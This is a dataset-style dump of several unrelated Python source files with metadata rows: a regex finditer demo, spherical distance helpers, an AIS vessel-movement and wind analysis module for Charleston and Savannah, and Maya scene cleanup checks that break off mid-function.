| cms/migrations/0041_certificatepage_signatoryindexpage_signatorypage.py | 5,071 | Generated by Django 2.2.3 on 2019-08-07 13:29 | 45 | en | 0.612438 |
#!python3.6
#coding:utf-8
#regex.finditer(string[, pos[, endpos]])
import re
regex = re.compile(r'^ab')
print(regex)
for target in ['abcdefg', 'cdefg', 'abcdabcd', 'cdabAB', 'ABcd']:
print(target, regex.finditer(target))
print()
regex = re.compile(r'^ab', re.IGNORECASE)
print(regex)
for target in ['abcdefg', 'cdefg', 'abcdabcd', 'cdabAB', 'ABcd']:
print(target, regex.finditer(target))
print()
regex = re.compile(r'ab', re.IGNORECASE)
print(regex)
for target in ['abcdefg', 'cdefg', 'abcdabcd', 'cdabAB', 'ABcd']:
print(target, regex.finditer(target))
print()
regex = re.compile(r'ab', re.IGNORECASE)
print(regex)
pos = 2
for target in ['abcdefg', 'cdefg', 'abcdabcd', 'cdabAB']:
print(target, regex.finditer(target, pos, endpos=len(target)))
print()
regex = re.compile(r'ab', re.IGNORECASE)
print(regex)
for target in ['abcdefg', 'cdefg', 'abcdabcd', 'cdabAB']:
match = regex.finditer(target, pos, endpos=len(target))
print(target, match)
if match:
print(' match.expand():', match.expand('XY'))#AttributeError: 'list' object has no attribute 'expand'
print(' match.group():', match.group())
print(' match.groups():', match.groups())
print(' match.groupdict():', match.groupdict())
print(' match.start():', match.start())
print(' match.end():', match.end())
print(' match.span():', match.span())
print(' match.pos:', match.pos)
print(' match.endpos:', match.endpos)
print(' match.lastindex:', match.lastindex)
print(' match.lastgroup:', match.lastgroup)
print(' match.re:', match.re)
print(' match.string:', match.string)
| 13/00/finditer.py | 1,673 | !python3.6coding:utf-8regex.finditer(string[, pos[, endpos]])AttributeError: 'list' object has no attribute 'expand' | 116 | en | 0.456734 |
import numpy as np
from .transform import sph2vec, vec2sph
def angle_between(ang1, ang2, sign=True):
d = (ang1 - ang2 + np.pi) % (2 * np.pi) - np.pi
if not sign:
d = np.abs(d)
return d
def angdist(v1, v2, zenith=True):
if v1.shape[0] == 2:
v1 = sph2vec(v1, zenith=zenith)
if v2.shape[0] == 2:
v2 = sph2vec(v2, zenith=zenith)
v1 /= np.linalg.norm(v1, axis=0)
v2 /= np.linalg.norm(v2, axis=0)
if v1.ndim > 1 or v2.ndim > 1:
d = np.einsum('ij,ij->j', v1, v2)
else:
d = np.dot(v1.T, v2)
# if d.ndim > 1:
# d = d.diagonal()
return np.absolute(np.arccos(d))
def eledist(v1, v2, zenith=True):
if v1.shape[0] == 3:
v1 = vec2sph(v1, zenith=zenith)
if v2.shape[0] == 3:
v2 = vec2sph(v2, zenith=zenith)
d = (v1[0] - v2[0] + np.pi) % (2 * np.pi) - np.pi
return np.absolute(d)
def azidist(v1, v2, zenith=True):
if v1.shape[0] == 3:
v1 = vec2sph(v1, zenith=zenith)
if v2.shape[0] == 3:
v2 = vec2sph(v2, zenith=zenith)
d = (v1[1] - v2[1] + np.pi) % (2 * np.pi) - np.pi
return np.absolute(d)
| sphere/distance.py | 1,142 | if d.ndim > 1: d = d.diagonal() | 35 | en | 0.119764 |
# Copyright 2020 The Maritime Whale Authors. All rights reserved.
# Use of this source code is governed by an MIT-style license that can be
# found in the LICENSE.txt file.
#
# Processes wind and vessel data. Performs simple analysis.
from match_wind_data import *
from datetime import *
from meet_and_pass import *
import pandas as pd
import math
import sys
# TODO: need to generalize this to apply to any port desired; will need to
# do the same for main, run, plot, etc
# vessel (AIS) types that should be automatically purged from analysis
# see details at https://api.vesselfinder.com/docs/ref-aistypes.html
AUTO_BLACKLIST = [30, 31, 32, 33, 34, 35, 36, 37, 51, 52, 53, 55, 57, 58, 59]
SUB_PANAMAX = 656 # threshold in feet
M_TO_FT = 3.28 # meters to feet (conversion)
def _sanitize_vmr(df):
"""Filters entries with '511' error, impossibly high speed, abnormally
high vessel width, as well as singletons (only one entry) from vessel
movement DataFrame.
Args:
df: Vessel movement DataFrame.
Returns:
Sanitized vessel movement report DataFrame.
"""
df = df.loc[~df.index.isin(df[df.loc[:, "Beam ft"] >= 500].index), :]
df = df.loc[~df.index.isin(df[df.loc[:, "Course"] == 511].index), :]
df = df.loc[~df.index.isin(df[df.loc[:, "Heading"] == 511].index), :]
df = df.loc[~df.index.isin(df[df.loc[:, "VSPD kn"] >= 40].index), :]
singleton = (df.loc[:, "MMSI"].value_counts() == 1)
single_mmsi = df.loc[:, "MMSI"].value_counts()[singleton].index.values
df = df.loc[~df.loc[:, "MMSI"].isin(single_mmsi), :]
return df
def _wrangle_vmr(df, rename):
"""Rounds, renames, and sanitizes vessel movment DataFrame. Creates new
columns.
Args:
df: Vessel movement DataFrame.
Returns:
Cleaned vessel movement report DataFrame.
"""
df.rename(rename, axis=1, inplace=True)
df.loc[:, "LOA ft"] = (df.loc[:, "A"] + df.loc[:, "B"]) * M_TO_FT
df.loc[:, "LOA ft"] = df.loc[:, "LOA ft"].round(0)
df.loc[:, "Beam ft"] = (df.loc[:, "C"] + df.loc[:, "D"]) * M_TO_FT
df.loc[:, "Beam ft"] = df.loc[:, "Beam ft"].round(0)
df.loc[:, "Latitude"] = df.loc[:, "Latitude"].round(5)
df.loc[:, "Longitude"] = df.loc[:, "Longitude"].round(5)
df = _sanitize_vmr(df)
# filter out sub-panamax class vessels
df = df.loc[df.loc[:, "LOA ft"] >= SUB_PANAMAX, :]
df.loc[:, "Date/Time UTC"] = df.loc[:, "Date/Time UTC"].str.strip("UTC")
df.loc[:, "Date/Time UTC"] = pd.to_datetime(df.loc[:, "Date/Time UTC"])
df = df.loc[:, (["Date/Time UTC", "Name", "MMSI", "LOA ft", "Latitude",
"Longitude", "Course", "AIS Type", "Heading", "VSPD kn",
"Beam ft"])]
return df
def _filter_blacklisters(df, blacklist):
"""Checks vessel AIS types and ommits blacklisted vessel types from the
filtered data. Appends ommitted vessels' MMSI's to blacklist.txt.
Args:
df: Vessel movement DataFrame.
Returns:
Filtered vessel movement DataFrame.
"""
df = df.loc[~df.loc[:, "MMSI"].isin(blacklist), :]
new_blacklisters = []
for j in range(df.shape[0]):
if df.iloc[j]["AIS Type"] in AUTO_BLACKLIST:
new_blacklisters.append(df.iloc[j]["MMSI"])
with open("../cache/blacklist.txt", "a") as f:
contents = [str(mmsi) for mmsi in new_blacklisters]
if contents:
f.write("\n".join(contents) + "\n")
df = df.loc[~df.loc[:, "MMSI"].isin(new_blacklisters), :]
return df
def _fold_vmr(ports, i):
"""Reduces movement report to a DataFrame with a single entry for each
vessel at the point of it's maximum speed in the channel. Includes a column
with the vessel's mean speed.
"""
mean = pd.DataFrame(ports[i].groupby(["Name", "MMSI"])["VSPD kn"]
.mean()).rename({"VSPD kn": "Mean Speed kn"}, axis=1).round(1)
maxes = pd.DataFrame(ports[i].groupby(["Name", "MMSI"])["VSPD kn"]
.max()).rename({"VSPD kn": "Max Speed kn"}, axis=1)
merged_speeds = maxes.merge(mean, on=["Name", "MMSI"])
max_dict = merged_speeds.loc[:, "Max Speed kn"].to_dict()
columns = {"Longitude":[], "Latitude":[], "Date/Time UTC":[],
"LOA ft":[], "Course":[], "AIS Type":[], "WSPD mph":[],
"GST mph":[], "WDIR degT":[], "Buoy Source":[], "Beam ft":[],
"Heading":[], "Course Behavior":[], "Effective Beam ft":[],
"Class":[], "Location":[], "Yaw deg":[], "Transit":[],
"% Channel Occupied":[]}
# grab remaining data based on max speed position
for key, value in max_dict.items():
for k in columns.keys():
columns[k].append(ports[i][(ports[i].loc[:, "Name"] == key[0]) &
(ports[i].loc[:, "VSPD kn"] == value)][k].iloc[0])
for key in columns.keys():
merged_speeds[key] = columns[key]
merged_speeds = merged_speeds.reset_index()
fold_res = merged_speeds
fold_res.sort_values("Max Speed kn", ascending=False, inplace=True)
return fold_res
def _add_channel_occ(ports, i):
"""Creates the channel occupancy column."""
# total channel width for CH and SV are 1000 and 600 ft respectively,
# but vary based on Class and transit condition
channel_width = [[800, 400, 1000, 500], [600, 300, 600, 300]]
# create % channel occupancy column for each vessel position based on
# effective beam, transit, and corresponding channel width
for row in range(len(ports[i])):
vessel_class = ports[i].loc[row, "Class"]
transit_type = ports[i].loc[row, "Transit"]
eff_beam = ports[i].loc[row, "Effective Beam ft"]
if ((vessel_class == "Post-Panamax") &
(transit_type == "One-way Transit")):
occ = (eff_beam / channel_width[i][0]) * 100
ports[i].loc[row, "% Channel Occupied"] = round(occ, 2)
elif ((vessel_class == "Post-Panamax") &
(transit_type == "Two-way Transit")):
occ = (eff_beam / channel_width[i][1]) * 100
ports[i].loc[row, "% Channel Occupied"] = round(occ, 2)
elif ((vessel_class == "Panamax") &
(transit_type == "One-way Transit")):
occ = (eff_beam / channel_width[i][2]) * 100
ports[i].loc[row, "% Channel Occupied"] = round(occ, 2)
elif ((vessel_class == "Panamax") &
(transit_type == "Two-way Transit")):
occ = (eff_beam / channel_width[i][3]) * 100
ports[i].loc[row, "% Channel Occupied"] = round(occ, 2)
else:
sys.stderr.write("Error: Undefined Class and " +
"transit combination...\n")
ports[i].loc[row, "% Channel Occupied"] = float("NaN")
return ports[i]
def _add_vessel_class(df):
"""Creates 'Class' column based on vessel LOA ft."""
df.loc[:, "Class"] = "Panamax"
post_row = (df.loc[:, "LOA ft"] > 965)
post_loc = df.loc[post_row, :].index
post_pan = df.index.isin(post_loc)
df.loc[post_pan, "Class"] = "Post-Panamax"
return df
def _course_behavior(df, ranges):
"""Creates 'Course Behavior' column based on channel specific course ranges.
"""
course_behavior = ("Outbound", "Inbound")
# filter on course ranges to isolate inbound and outbound ships only
df = df[(df.loc[:, "Course"] >= ranges[0][0]) &
(df.loc[:, "Course"] <= ranges[0][1]) |
(df.loc[:, "Course"] >= ranges[1][0]) &
(df.loc[:, "Course"] <= ranges[1][1])]
df.loc[:, "Course"] = round(df.loc[:, "Course"]).astype("int")
df.loc[:, "Course Behavior"] = df.loc[:, "Course"].copy()
# replace course values with general inbound and outbound behavior
courses = {}
for behavior, bounds in zip(course_behavior, ranges):
lower_bound = bounds[0]
upper_bound = bounds[1]
for j in range(lower_bound, upper_bound + 1):
courses[j] = behavior
df.loc[:, "Course Behavior"] = (df.loc[:, "Course Behavior"]
.replace(courses).astype("str"))
return df
def process_report(path):
"""Processes data from vessel movement report. Adds data from wind buoys,
performs meeting and passing analysis. Creates other relevant columns.
Args:
path: Relative path to raw vessel movement report (CSV).
Returns:
Two pairs of two DataFrames cooresponding to the movement report.
The first pair of DataFrames contains all vessel movements belonging to
Charleston and Savannah, respectively. The second pair of DataFrames
stores the vessel movement entries at which each vessel achieved
its maximum speed. Again, the first DataFrame in the pair belongs to
Charleston and the second DataFrame belongs to Savannah.
"""
blacklist = [int(mmsi) for mmsi in open("../cache/blacklist.txt",
"r").readlines()]
df = pd.read_csv(path)
df = _wrangle_vmr(df, {"DATETIME (UTC)": "Date/Time UTC", "NAME": "Name",
"LATITUDE": "Latitude", "LONGITUDE": "Longitude",
"SPEED": "VSPD kn", "COURSE": "Course", "HEADING":
"Heading", "AIS TYPE": "AIS Type"})
ch_course_ranges = ((100, 140), (280, 320)) # (outbound, inbound)
sv_course_ranges = ((100, 160), (280, 340)) # (outbound, inbound)
# longitudinal channel midpoint for Charleston and Savannah respectively
channel_midpoint = ((-79.74169), (-80.78522))
course_ranges = (ch_course_ranges, sv_course_ranges)
ports = [None, None] # ch, sv
# Charleston NOAA wind buoy ID (41004)
# Savannah NOAA wind buoy ID (41008)
buoys = [{"41004":None}, {"41008":None}] # main wind buoys
alt_buoys = [{"41008":None}, {"41004":None}] # alternate wind buoys
# split data into Charleston and Savannah DataFrames based on latitude
for i in range(len(ports)):
ch_df = (df.loc[:, "Latitude"] >= 32.033)
sv_df = (df.loc[:, "Latitude"] < 32.033)
ports[i] = df[ch_df] if (i == 0) else df[sv_df]
# if there is no vessel data on a given day (e.g. major holidays)
# return empty DataFrames
if not len(ports[i]):
empty = pd.DataFrame({"Date/Time UTC":[], "Name":[], "MMSI":[],
"Max Speed kn":[], "Mean Speed kn":[],
"LOA ft":[], "Beam ft":[], "Class":[],
"AIS Type":[], "Course":[], "Heading":[],
"Course Behavior":[], "Yaw deg":[],
"Effective Beam ft":[], "WDIR degT":[],
"WSPD mph":[], "GST mph":[], "Buoy Source":[],
"Location":[], "Latitude":[], "Longitude":[],
"Transit":[], "% Channel Occupied":[]})
ports[i] = [empty, empty]
continue
ports[i].loc[:, "Location"] = "Nearshore"
off_row = (ports[i].loc[:, "Longitude"] > channel_midpoint[i])
off_loc = ports[i].loc[off_row, :].index
offshore_indices = ports[i].index.isin(off_loc)
ports[i].loc[offshore_indices, "Location"] = "Offshore"
ports[i] = add_wind(ports, i, buoys, alt_buoys)
ports[i] = _course_behavior(ports[i], course_ranges[i])
ports[i] = _add_vessel_class(ports[i])
# create yaw column based on difference between course and heading
ports[i].loc[:, "Yaw deg"] = abs(ports[i].loc[:, "Course"] -
ports[i].loc[:, "Heading"])
# compute effective beam based on vessel beam, loa, and yaw
eff_beam = []
loa = ports[i].loc[:, "LOA ft"].values
beam = ports[i].loc[:, "Beam ft"].values
yaw = ports[i].loc[:, "Yaw deg"].values
for l in range(ports[i].shape[0]):
# effective beam formula derived using trigonometry and geometry
# of vessel positions
eff_beam.append(round((math.cos(math.radians(90 - yaw[l])) *
loa[l]) + (math.cos(math.radians(yaw[l])) *
beam[l])))
ports[i].loc[:, "Effective Beam ft"] = eff_beam
ports[i].loc[:, "Effective Beam ft"] = ports[i].loc[:,
"Effective Beam ft"].round(0)
# remove unwanted blacklist vessels
ports[i] = _filter_blacklisters(ports[i], blacklist)
# create rounded DateTime column for meetpass analysis
stamps = len(ports[i].loc[:, "Date/Time UTC"]) # number of timestamps
round_times = [ports[i].loc[:, "Date/Time UTC"].iloc[ii].floor("Min")
for ii in range(stamps)]
ports[i].loc[:, "rounded date"] = round_times
# run meetpass analysis and create Transit column based on results
mp = meetpass(ports[i])
two_way = twoway(ports[i], mp)
ports[i].loc[:, "Transit"] = "One-way Transit"
if not isinstance(two_way, type(None)):
two_way_indices = ports[i].index.isin(two_way.index)
ports[i].loc[two_way_indices, "Transit"] = "Two-way Transit"
# reset index to clear previous pandas manipulations
ports[i] = ports[i].reset_index()
ports[i] = _add_channel_occ(ports, i)
# save current format of data as all_res to be used for all positions
all_res = ports[i]
# remove sections of channel where ships turn
if i % 2:
all_res = all_res[(all_res.loc[:, "Latitude"] <= 32.02838) &
(all_res.loc[:, "Latitude"] >= 31.9985) |
(all_res.loc[:, "Latitude"] <= 31.99183)]
else:
all_res = all_res[all_res.loc[:, "Latitude"] >= 32.667473]
fold_res = _fold_vmr(ports, i)
# return max and mean positional data in specified order
fold_res = fold_res.loc[:, ("Date/Time UTC", "Name", "MMSI",
"Max Speed kn", "Mean Speed kn", "LOA ft",
"Beam ft", "Class", "AIS Type", "Course",
"Heading", "Course Behavior", "Yaw deg",
"Effective Beam ft", "WDIR degT",
"WSPD mph", "GST mph", "Buoy Source",
"Location", "Latitude", "Longitude",
"Transit", "% Channel Occupied")]
# return positional data in specified order
all_res = all_res.loc[:, ("Name", "MMSI", "VSPD kn", "WSPD mph",
"Transit", "% Channel Occupied", "Yaw deg",
"Effective Beam ft", "LOA ft", "Beam ft",
"Class", "AIS Type", "Course", "Heading",
"Course Behavior", "WDIR degT", "GST mph",
"Buoy Source", "Location", "Latitude",
"Longitude", "Date/Time UTC")]
# save two copies of daily vmr for each port, one for all vessel
# positions and one for maximum vessel speed positions
ports[i] = [fold_res, all_res]
return ports[0], ports[1] # ch, sv
| src/process_maritime_data.py | 15,359 | Creates the channel occupancy column.
Creates 'Class' column based on vessel LOA ft.
Creates 'Course Behavior' column based on channel specific course ranges.
Checks vessel AIS types and ommits blacklisted vessel types from the
filtered data. Appends ommitted vessels' MMSI's to blacklist.txt.
Args:
df: Vessel movement DataFrame.
Returns:
Filtered vessel movement DataFrame.
Reduces movement report to a DataFrame with a single entry for each
vessel at the point of it's maximum speed in the channel. Includes a column
with the vessel's mean speed.
Filters entries with '511' error, impossibly high speed, abnormally
high vessel width, as well as singletons (only one entry) from vessel
movement DataFrame.
Args:
df: Vessel movement DataFrame.
Returns:
Sanitized vessel movement report DataFrame.
Rounds, renames, and sanitizes vessel movment DataFrame. Creates new
columns.
Args:
df: Vessel movement DataFrame.
Returns:
Cleaned vessel movement report DataFrame.
Processes data from vessel movement report. Adds data from wind buoys,
performs meeting and passing analysis. Creates other relevant columns.
Args:
path: Relative path to raw vessel movement report (CSV).
Returns:
Two pairs of two DataFrames cooresponding to the movement report.
The first pair of DataFrames contains all vessel movements belonging to
Charleston and Savannah, respectively. The second pair of DataFrames
stores the vessel movement entries at which each vessel achieved
its maximum speed. Again, the first DataFrame in the pair belongs to
Charleston and the second DataFrame belongs to Savannah.
Copyright 2020 The Maritime Whale Authors. All rights reserved. Use of this source code is governed by an MIT-style license that can be found in the LICENSE.txt file. Processes wind and vessel data. Performs simple analysis. TODO: need to generalize this to apply to any port desired; will need to do the same for main, run, plot, etc vessel (AIS) types that should be automatically purged from analysis see details at https://api.vesselfinder.com/docs/ref-aistypes.html threshold in feet meters to feet (conversion) filter out sub-panamax class vessels grab remaining data based on max speed position total channel width for CH and SV are 1000 and 600 ft respectively, but vary based on Class and transit condition create % channel occupancy column for each vessel position based on effective beam, transit, and corresponding channel width filter on course ranges to isolate inbound and outbound ships only replace course values with general inbound and outbound behavior (outbound, inbound) (outbound, inbound) longitudinal channel midpoint for Charleston and Savannah respectively ch, sv Charleston NOAA wind buoy ID (41004) Savannah NOAA wind buoy ID (41008) main wind buoys alternate wind buoys split data into Charleston and Savannah DataFrames based on latitude if there is no vessel data on a given day (e.g. major holidays) return empty DataFrames create yaw column based on difference between course and heading compute effective beam based on vessel beam, loa, and yaw effective beam formula derived using trigonometry and geometry of vessel positions remove unwanted blacklist vessels create rounded DateTime column for meetpass analysis number of timestamps run meetpass analysis and create Transit column based on results reset index to clear previous pandas manipulations save current format of data as all_res to be used for all positions remove sections of channel where ships turn return max and mean positional data in specified order return positional data in specified order save two copies of daily vmr for each port, one for all vessel positions and one for maximum vessel speed positions ch, sv | 3,761 | en | 0.846651 |
import maya.mel as mm
import maya.cmds as mc
import glTools.utils.attribute
import glTools.utils.base
import glTools.utils.layer
import glTools.utils.reference
import glTools.utils.shader
import glTools.utils.shape
import glTools.utils.transform
import re
# ===========
# - Cleanup -
# ===========
def toggleCons(state):
'''
Toggle the display state of all joint buffers ('Con') in the scene
@param state: The display state to set the joint buffers to
@type state: bool
'''
# Get List of Con Joints
conList = mc.ls('*Con*_jnt',type='joint')
for conJnt in conList:
# Toggle State
if state:
glTools.utils.base.displayOverride(conJnt,overrideEnable=1,overrideLOD=0)
mc.setAttr(conJnt+'.drawStyle',0) # Bone
else:
glTools.utils.base.displayOverride(conJnt,overrideEnable=1,overrideLOD=1)
mc.setAttr(conJnt+'.drawStyle',2) # None
# Set Joint Radius
if mc.getAttr(conJnt+'.radius',se=True):
mc.setAttr(conJnt+'.radius',0.0)
mc.setAttr(conJnt+'.radius',cb=False)
# Hide Rotate Order
if mc.getAttr(conJnt+'.ro',se=True):
mc.setAttr(conJnt+'.ro',cb=False)
# Return Result
return conList
def toggleEnds(state):
'''
Toggle the display state of all joint buffers ('Con') in the scene
@param state: The display state to set the joint buffers to
@type state: bool
'''
# Get list of End joints
endList = mc.ls('*End_jnt',type='joint')
for endJnt in endList:
# Toggle state
if state:
glTools.utils.base.displayOverride(endJnt,overrideEnable=1,overrideLOD=0)
mc.setAttr(endJnt+'.drawStyle',0) # Bone
else:
glTools.utils.base.displayOverride(endJnt,overrideEnable=1,overrideLOD=1)
mc.setAttr(endJnt+'.drawStyle',2) # None
# Set Joint Radius
if mc.getAttr(endJnt+'.radius',se=True):
mc.setAttr(endJnt+'.radius',0.0)
mc.setAttr(endJnt+'.radius',cb=False)
# Hide Rotate Order
if mc.getAttr(endJnt+'.ro',se=True):
mc.setAttr(endJnt+'.ro',cb=False)
# Return Result
return endList
def disableDrawingOverrides(grp):
'''
Disable drawing overrides for all DAG descendents of the specified transform node.
@param state: The transform under which all descendent node drawing overrides will be disabled.
@type state: bool
'''
# ==========
# - Checks -
# ==========
if not mc.objExists(grp):
raise Exception('Transform "'+grp+'" does not exists!')
if not glTools.utils.transform.isTransform(grp):
raise Exception('Object "'+grp+'" is not a valid transform!')
# Get Descendent Node List
nodeList = mc.ls(mc.listRelatives(grp,ad=True, pa=True) or [],dag=True) or []
if not nodeList: return []
# =============================
# - Disable Drawing Overrides -
# =============================
overrideName = 'overrideEnabled'
for node in nodeList:
# Check Override Attribute
overrideAttr = node+'.'+overrideName
if not mc.attributeQuery(overrideName,n=node,ex=True):
print('Override attribute "'+overrideAttr+'" does not exist! Skipping...')
continue
# Check Override Attribute Connections
overrideConn = mc.listConnections(overrideAttr,s=True,d=False) or []
if overrideConn:
print('Found incoming connection for override attribute "'+overrideAttr+'"! ('+overrideConn[0]+')')
print('Disconnecting attribute and disabling drawing overrides...')
mc.disconnectAttr(overrideConn[0],overrideAttr)
# Disable Drawing Overrides
try: mc.setAttr(overrideAttr,0)
except: pass
# =================
# - Return Result -
# =================
return nodeList
# ==========
# - Checks -
# ==========
def uniqueNameCheck(objList=[],transformsOnly=False):
'''
Return a list of nodes with non unique names
@param objList: List of scene objects to check. If empty, use all existing scene nodes.
@type objList: list
@param transformsOnly: Check transform names only
@type transformsOnly: bool
'''
# Get list of scene nodes
if not objList:
objList = mc.ls()
if transformsOnly:
nodeList = mc.ls(objList,transforms=True)
else:
nodeList = mc.ls(objList,dag=True)
# Determine non unique names
nonUniqueList = [i for i in nodeList if i.count('|')]
# Return result
return nonUniqueList
def validNameCheck(objList=[]):
'''
Check for valid names in the specified list of nodes
@param objList: List of objects to check valid names for. If empty use all scene transforms
@type objList: list
'''
# Check geo list
if not objList: objList = mc.ls()
if not objList: return []
# Remove Default Nodes
defNodes = ['dof1','time1','lambert1','postProcessList1','sequenceManager1','lightLinker1','renderGlobalsList1','dynController1','lightList1','particleCloud1','shaderGlow1']
objList = [obj for obj in objList if not defNodes.count(obj)]
objList = [obj for obj in objList if not obj.startswith('default')]
objList = [obj for obj in objList if not mc.nodeType(obj) == 'objectTypeFilter']
objList = [obj for obj in objList if not mc.nodeType(obj) == 'objectNameFilter']
objList = [obj for obj in objList if not mc.nodeType(obj) == 'objectScriptFilter']
# Check valid names
result = []
for obj in objList:
# Check prefix
#if not obj.startswith('cn_') and not obj.startswith('lf_') and not obj.startswith('rt_'):
# result.append(obj)
# Check "pasted"
if obj.count('pasted'): result.append(obj)
# Check "poly"
if obj.count('poly'): result.append(obj)
# Check double underscore "__"
if obj.count('__'): result.append(obj)
# Check names ending with a digit (0-9)
digitSearch = re.search('(\d+)$', obj)
if digitSearch and glTools.utils.transform.isTransform(obj):
if digitSearch.group(0):
result.append(obj)
# Remove Duplicate Entries
result = list(set(result))
# Return result
return result
def shapeNameCheck( objList = [],
typeList = ['mesh','nurbsCurve','nurbsSurface'],
skipIntermediates = True,
skipMultipleShapes = False,
strict = True ):
'''
Return a list of incorrectly named geometry shape nodes.
@param objList: List of objects to check for valid shape names. If empty, get all nodes of the specified type.
@type objList: list
@param typeList: List of shape types to check for valid names.
@type typeList: list
@param skipIntermediates: Skip intermediate shapes.
@type skipIntermediates: bool
@param skipMultipleShapes: Skip objects with multiple shape nodes.
@type skipMultipleShapes: bool
@param strict: Shape name must match parent+"Shape" to pass.
@type strict: bool
'''
# ==========
# - Checks -
# ==========
if not objList: objList = mc.ls(type=typeList)
# ====================
# - Build Shape List -
# ====================
shapeList = []
for obj in objList:
# Get Shapes from Transform
if glTools.utils.transform.isTransform(obj):
# Check Multiple Shapes
objShapes = mc.listRelatives(obj,s=True,pa=True)
if not objShapes: continue
if (len(objShapes) > 1) and skipMultipleShapes: continue
# Get Shapes
tShapeList = mc.listRelatives(obj,s=True,ni=skipIntermediates,pa=True)
for shape in tShapeList:
shapeList.append(obj)
elif glTools.utils.shape.isShape(obj):
shapeList.append(obj)
else:
print('Unable to determine shape from object "'+obj+'"! Skipping...')
# =====================
# - Check Shape Names -
# =====================
invalidShapeNameList = []
for shape in shapeList:
# Check Type
if not typeList.count(mc.objectType(shape)): continue
# Check Intermediate Object
if skipIntermediates and mc.getAttr(shape+'.intermediateObject'): continue
# Get transform parent name
parent = mc.listRelatives(shape,p=True,pa=True)[0]
# Get Short Names
shapeSN = mc.ls(shape,sn=True)[0]
parentSN = mc.ls(parent,sn=True)[0]
# Check Shape Name
if strict and (shape != parent+'Shape'):
invalidShapeNameList.append(shape)
if not shapeSN.startswith(parentSN):
invalidShapeNameList.append(shape)
elif not shapeSN.count('Shape'):
invalidShapeNameList.append(shape)
# =================
# - Return Result -
# =================
return invalidShapeNameList
def intermediateShapesCheck(objList=[]):
'''
Return a list of intermediate shapes.
@param objList: List of objects to check for intermediate shapes.
@type objList: list
'''
# Check nodeList
if not objList: objList = mc.ls(transforms=True)
else: objList = mc.ls(objList,transforms=True)
# For each node
result = []
for obj in objList:
# Get All Shapes
shapes = mc.listRelatives(obj,s=True,pa=True)
if not shapes: shapes = []
for shape in shapes:
# Check Intermediate Shapes
if mc.objExists(shape+'.intermediateObject'):
if mc.getAttr(shape+'.intermediateObject'):
result.append(shape)
# Return Result
return result
def multipleShapeCheck(objList=[]):
'''
Return a list of transforms with multiple shape nodes
@param objList: List of objects to check for multiple shapes.
@type objList: list
'''
# Get scene transforms
if not objList: objList = mc.ls(transforms=True)
else: objList = mc.ls(objList,dag=True)
# Iterate over scene transforms
result = []
for transform in objList:
# Check Transform
if not glTools.utils.transform.isTransform(transform):
transform = mc.listRelatives(transform,p=True)[0]
# Get transform shape list
shapeList = mc.listRelatives(transform,s=True)
# Check shape list
if not shapeList: continue
shapeList = mc.ls(shapeList,type=['mesh','nurbsSurface','nurbsCurve'])
# Check number of shapes
if len(shapeList) > 1: result.append(transform)
# Return result
return result
def constructionHistoryCheck(geoList=[]):
'''
Return a list of nodes that contain construction history
@param objList: List of objects to check for construction history.
@type objList: list
'''
# Get Scene Geometry
if not geoList:
geoList = mc.ls(geometry=True)
else:
geoList = mc.listRelatives(geoList,s=True,pa=True)
# For each node
result = []
for geo in geoList:
# Check Construction History
hist = mc.listHistory(geo)
# Remove Self
if hist.count(geo): hist.remove(geo)
# Ignore Node Types
ignore = mc.ls(hist,type=['groupId','shadingEngine','transform'])
hist = list(set(hist)-set(ignore))
# Check History
if hist:
obj = mc.listRelatives(geo,p=True,pa=True)
result.extend(obj)
# Remove Duplicate Names
if result: result = list(set(result))
# Return Result
return result
def userAttrCheck(objList=[],includeShapes=False):
'''
Return a list of user defined attributes for a specified list of nodes (and shapes).
@param objList: List of objects to check for user defined attributes.
@type objList: list
@param includeShapes: Also check shapes for user defined attributes.
@type includeShapes: bool
'''
# Initialize Return List
result = []
# Check objList
if not objList: objList = mc.ls()
# For each node
for obj in objList:
userAttrs = mc.listAttr(obj,ud=True)
if not userAttrs: userAttrs = []
for attr in userAttrs:
result.append(obj+'.'+attr)
# Check Shapes
if includeShapes:
shapes = mc.listRelatives(obj,s=True)
if not shapes: shapes = []
for shape in shapes:
userAttrs = mc.listAttr(shape,ud=True)
if not userAttrs: userAttrs = []
for attr in userAttrs:
result.append(shape+'.'+attr)
# Return Result
return result
def emptyGroupCheck(objList=[]):
'''
List empty groups.
@param objList: List of transforms to check.
@type objList: list
'''
# Check objList
if not objList: objList = mc.ls(transforms=True)
else: objList = mc.ls(objList,transforms=True)
# Find Empty Groups
result = []
for grp in objList:
if not mc.listRelatives(grp,ad=True):
result.append(grp)
# Return Result
return result
def emptySetCheck(setList=[]):
'''
Return a list of empty sets
@param setList: List of sets to check.
@type setList: list
'''
# Check setList
if not setList: setList = mc.ls(sets=True)
# Check empty sets
result = []
for setName in setList:
# Check Set
if not mc.ls(setName,sets=True): continue
# Skip Default Sets
if setName.startswith('default'): continue
if setName.startswith('initial'): continue
# Check Set
if not mc.sets(setName,q=True):
result.append(setName)
# Return result
return result
def emptyLayerCheck(layerList=[]):
'''
Return a list if empty layers
@param layerList: List of layers to check. If empty, use all existing layers in current scene.
@type layerList: list
'''
# Check Layer List
if not layerList: layerList = mc.ls(type=['displayLayer','renderLayer','animLayer'])
else: layerList = mc.ls(layerList,type=['displayLayer','renderLayer','animLayer'])
# Check Empty Layers
result = []
for layer in layerList:
# Check Layer
if not mc.ls(layer,type=['displayLayer','renderLayer','animLayer']): continue
# Skip Default Layers
if layer.startswith('default'): continue
# Check Membership
if not glTools.utils.layer.memberList(layer):
result.append(layer)
# Return Result
return result
def animCurveCheck(curveTypeList=['animCurveTL','animCurveTA','animCurveTT','animCurveTU','animCurveUL','animCurveUA','animCurveUT','animCurveUU']):
'''
Return a list of all existing animCurves of a specified type.
@param curveList: List of animCurve types to consider.
@type curveList: list
@param curveTypeList: List of animCurve types to consider.
@type curveTypeList: list
'''
# Initialize Return List
animCurves = []
# List AnimCurve Nodes
for curveType in curveTypeList:
curveList = mc.ls(type=curveType)
if curveList:
animCurves.extend(curveList)
# Return Result
return animCurves
def unusedShadingNodeCheck():
'''
Return a list of unused shading nodes.
'''
return glTools.utils.shader.listUnusedShadingNodes()
def noGeometryShaderCheck(geoList=[]):
'''
Return a list of non intermediate geometry shapes with no shader assignment.
@param geoList: List of geometry to check for shader assignments.
@type geoList: list
'''
# Check Geometry List
if not geoList:
geoList = mc.ls(type=['mesh','nurbsSurface'],ni=True)
else:
geoList += mc.ls(mc.listRelatives(geoList,ad=True,pa=True) or [],type=['mesh','nurbsSurface'],ni=True) or []
geoList = mc.ls(geoList,type=['mesh','nurbsSurface'],ni=True)
# Check Shader Assignment
noShaderList = []
for geo in geoList:
SG = glTools.utils.shader.getSG(geo)
if not SG: noShaderList.append(geo)
